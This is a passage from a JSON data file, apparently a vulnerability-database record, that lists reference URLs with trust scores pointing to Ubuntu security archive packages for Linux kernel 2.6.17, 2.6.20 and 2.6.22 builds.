        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-386_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-xen_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.43_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64-smp_2.6.22-14.51_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
